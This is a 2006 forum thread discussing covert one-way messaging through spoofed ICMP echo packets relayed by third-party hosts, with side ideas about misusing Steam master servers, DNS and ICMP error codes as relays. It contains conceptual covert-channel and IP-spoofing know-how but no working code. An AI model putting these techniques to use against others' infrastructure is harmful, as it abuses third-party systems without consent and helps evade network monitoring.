Using ICMP for anonymous one way communications

[Guest ash-]

I've had this idea for awhile to use spoofed ICMP packets as a way to transmit data through a proxy (not a socks proxy or any of that garbage). Basically, it would be something like this: You have the IP address of the person you want to send a message to. You craft an ICMP ping packet and spoof the source address to that of the person you wish to send the message to. The destination address is the "proxy". The payload datagram is where your message goes. The proxy picks up the ICMP packet and replies to the source address, relaying your message anonymously.

 

This could be used for anonymous file transfers or for secret communications (ie chinese dissidents) If anyone knows some C and sockets, then perhaps we could work out something? In order to really test it out, it would take access to two machines. One for sending the spoofed messages and the other for reading them. The proxy can be any machine on the internet that will accept spoofed source IP addresses.

 

I also had a similiar idea that involves the steam master servers. You could for instance register a fake server and put your own data that you want to send out in place of information like player names on the server, cvars etc. Someone else can search the server list with filters and download this data directly from steams servers. This would in effect, turn the steam master servers into a proxy for communications or maybe even simple file transfers.

[emptyd]

The payload datagram is where your message goes.

 

I had a similar idea a couple of years ago for use by the same people - Chinese dissidents. I hadn't thought of the spoofed IP address approach though - just the ICMP payload side. I figured that ICMP was ubiquitous enough that an encrypted message in the payload would go unnoticed - and if noticed, the encryption would be a further deterrent.

 

One problem I saw with the approach is the that not all routers/internet infrastructure/machines route/respond to ICMP. But it is still worth some thought.

 

I program in C/C++ and have done socket work in vb.net & java – the windows version shouldn’t be too different.

 

Perhaps you could explain the spoofing side of things to me a bit more and we could dabble a bit with this.

 

I’m planning on being in China middle of next year. We might be able to get something to a test state by then?

[Guest ash-]

The payload datagram is where your message goes.

 

I had a similar idea a couple of years ago for use by the same people - Chinese dissidents. I hadn't thought of the spoofed IP address approach though - just the ICMP payload side. I figured that ICMP was ubiquitous enough that an encrypted message in the payload would go unnoticed - and if noticed, the encryption would be a further deterrent.

 

One problem I saw with the approach is the that not all routers/internet infrastructure/machines route/respond to ICMP. But it is still worth some thought.

 

I program in C/C++ and have done socket work in vb.net & java – the windows version shouldn’t be too different.

 

Perhaps you could explain the spoofing side of things to me a bit more and we could dabble a bit with this.

 

I’m planning on being in China middle of next year. We might be able to get something to a test state by then?

 

 

First of all we all know that any computer with ICMP enabled will respond to a simple ping request. Say there's 3 machines with these ip's: 66.30.30.1, 66.30.30.2, 66.30.30.3. I'm on .1 and I want to send a message to .3. I create an ICMP packet and spoof my source address to be 66.30.30.3 and put "hello world" in the datagram (of course, ping sends back the datagram when it replies). I send this packet to .2 and it thinks that I'm really .3 because I spoofed my source address so it relays the packet to him!

 

With encryption, it could be impossible to know what kind of communications are taking place. It may be useful for P2P anonymity or numerous things that I havn't thought of yet.

 

ICMP isn't the only protocol that can be "exploited" in such a manner. The steam master servers can be used in a similiar fashion to relay messages. I'm sure Valve would frown upon this though so I'm not too optimistic about it. DNS servers may also work as relays.

[emptyd]

First of all we all know that any computer with ICMP enabled will respond to a simple ping request. Say there's 3 machines with these ip's: 66.30.30.1, 66.30.30.2, 66.30.30.3. I'm on .1 and I want to send a message to .3. I create an ICMP packet and spoof my source address to be 66.30.30.3 and put "hello world" in the datagram (of course, ping sends back the datagram when it replies). I send this packet to .2 and it thinks that I'm really .3 because I spoofed my source address so it relays the packet to him!

 

Okay, now I get it. You do still have the problem of firewalls that filter out ICMP. I have some friends that manage the network at a small college near where I live - and they filter ALL external ICMP. But it could work if ICMP is allowed to pass. Have you heard of the Great Firewall of China? Their government is using some pretty sophisticated stuff and I don’t know how freely ICMP goes in and out.

 

The other potential problem I see is the spoofing side. My ISP will drop any traffic that comes from me that claims to be coming from another address other than those they have assigned to me. At least I believe that is the way it works. So I would have a hard time spoofing from my home – and a lot of other people may be in the same boat – yes?

 

I’m not trying to rain on your parade at all – I really like the idea – I’m just trying to figure out some of the wrinkles before we start banging out code.

[Guest ash-]

First of all we all know that any computer with ICMP enabled will respond to a simple ping request. Say there's 3 machines with these ip's: 66.30.30.1, 66.30.30.2, 66.30.30.3. I'm on .1 and I want to send a message to .3. I create an ICMP packet and spoof my source address to be 66.30.30.3 and put "hello world" in the datagram (of course, ping sends back the datagram when it replies). I send this packet to .2 and it thinks that I'm really .3 because I spoofed my source address so it relays the packet to him!

 

Okay, now I get it. You do still have the problem of firewalls that filter out ICMP. I have some friends that manage the network at a small college near where I live - and they filter ALL external ICMP. But it could work if ICMP is allowed to pass. Have you heard of the Great Firewall of China? Their government is using some pretty sophisticated stuff and I don’t know how freely ICMP goes in and out.

 

The other potential problem I see is the spoofing side. My ISP will drop any traffic that comes from me that claims to be coming from another address other than those they have assigned to me. At least I believe that is the way it works. So I would have a hard time spoofing from my home – and a lot of other people may be in the same boat – yes?

 

I’m not trying to rain on your parade at all – I really like the idea – I’m just trying to figure out some of the wrinkles before we start banging out code.

 

 

Yep, I've already considered most of this stuff. I ran some tests with nmap a long time ago and confirmed that SBC (my isp) will allow spoofed packets. However, I do not know if that is still the case. One thing that worries me is whether or not they have net admins sitting at a console watching ethereal. I'm not a networking guru so I don't know what kind of technology they could use to watch spoofed packets. AFAIK there's nothing illegal about spoofing your ip address. Winsock2 and most variations of *nix allow raw sockets without hassle; nmap is also a well known program that allows easy IP spoofing. In fact, nmap could probably be used as a quick PoC for this idea.

 

I had some other ideas with ICMP error codes. We could for instance transfer (or relay) messages with a large amount of error codes. With 256 bits being usable for error codes, we could encode/decode it as ASCII. This would require sending a new packet per char though. I have not put as much thought into this idea as the previous one.

 

EDIT: I think microsoft disabled raw sockets in one of their updates. Not too sure but I just remembered something about the nmap authors trying to get a workaround for it.

Edited August 25, 2006 by ash-

[Z3RO]

im just going to take some advill and walk away

[emptyd]

One thing that worries me is whether or not they have net admins sitting at a console watching ethereal.

 

The amount of traffic they carry is unreal! I'd find it unlikely that they just blindly monitor packets w/ a sniffer like ethereal.

 

It is more likely the do some intelligent traffic analysis to try and determine patterns of use that can direct their attention more precisely.

 

On the other hand I met a lady who used to work for the Chinese government and in her town of 500,000 or so, they employed 25,000 people just listening in on regional phone calls! No lack of labor force for them!

 

Sounds like you are more of an *ix guy than me – I know just enough to be dangerous there. Most of my experience programming is then Windows world. Is there a version on nmap for Windows? I’d like to do some tests.